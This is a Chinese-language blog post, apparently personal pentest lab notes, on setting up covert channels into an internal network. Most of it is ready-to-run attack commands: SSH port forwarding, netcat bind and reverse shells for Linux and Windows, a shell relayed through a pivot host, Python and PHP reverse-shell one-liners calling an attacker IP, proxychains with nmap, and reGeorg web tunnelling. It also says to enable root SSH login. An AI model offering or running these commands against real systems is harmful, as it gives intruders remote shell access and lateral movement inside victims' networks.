2022-02-23建立通信通道

本地局域网端口转发

攻击机:ssh -CfNg -L 8888:192.168.11.13:3389 root@127.0.0.1

root密码无法成功被限制,修改sshd_config文件的PermitRootLogin为yes

vim /etc/ssh/sshd_config

远程连接

攻击机:rdesktop 127.0.0.1:8888


远程端口转发

边缘机:Nat(ip):192.168.70.130   仅主机(局域网ip):192.168.11.13

ssh -CfNg -R 8888:靶机ip:3389 root@攻击机ip

ssh -CfNg -R 8888:192.168.11.13:3389 root@192.168.70.132

攻击机:Nat(ip):192.168.70.132

rdesktop 127.0.0.1:8888


动态端口转发


nc:正向shell

llinux靶机:nc -lvp 8888 -e /bin/bash

linux攻击机:nc 靶机Nat(ip) 8888

nc 192.168.70.130 8888

windows靶机:nc.exe -lvp 8888 -e cmd.exe

windows攻击机:nc.exe 靶机Nat(ip) 8888

nc 192.168.70.131 8888

反向shell

linux攻击机:nc -lvp 8888

linux靶机:nc 攻击机Nat(ip) 8888 -e /bin/bash

nc 192.168.70.132 8888 -e /bin/bash

windows攻击机:nc.exe -lvp 8888

windows靶机:nc.exe 攻击机Nat(ip) 8888 -e cmd.exe

nc.exe 192.168.133 8888 -e cmd.exe

通过跳板机反弹shell(linux)

windows靶机: nc.exe -lvp 6666 -e cmd.exe

linux攻击机:nc -lvp 8888

linux边界机: nc -nv 攻击机Nat(ip) 8888 -c "nc 靶机局域网ip 6666"

nc -nv 192.168.70.132 8888 -c "nc 192.168.11.13 6666"

windows靶机: nc.exe -lvp 6666 -e cmd.exe

windows攻击机:nc.exe -lvp 8888

windows边界机: nc.exe -nv 攻击机Nat(ip) 8888 -c "nc 靶机局域网ip 6666"

nc -nv 192.168.70.133 8888 -c "nc 192.168.11.13 6666"

反弹shell ---python

攻击机:nc -lvp 8888

靶机:执行命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机ip",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

反弹shell ---php

攻击机:nc -lvp 8888

靶机:执行命令

php -r '$sock=fsockopen("192.168.6.157",8888);exec("/bin/sh -i <&3 >&3 2>&3");'


代理客户端工具——proxychains

• 攻击机客户端上配置:vim /etc/proxychains4.conf

修改配置文件 socks5 127.0.0.1 8888

• 例1:proxychains4 curl http://192.168.11.12

• 例2:proxychains4 nmap -Pn -sT -n 192.168.11.12 -p 3389,80,139

• 例3:proxychains4 firefox

• 例4:proxychains rdesktop 192.168.11.12 

reGeorg( HTTP/HTTPS协议)

• HTTP Service代理将所有流量转发到内网,常见的有reGeorg、tuna

• reGeorg是reDuh的升级版,可以将内网服务器端口的数据通过http/https隧道转发

到本机,但是reGeorg的通信特征明显,会被很多杀毒软件查杀

• 支持 ASPX、PHP、JSP等Web脚本

• 下载: https://github.com/sensepost/reGeorg

• 边界机上:www目录下放置tunnel.nosocket.php文件,作为代理服务端

• 攻击机上:python reGeorgSocksProxy.py -u http://192.168.7.147/tunnel.nosocket.php -p 8888

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容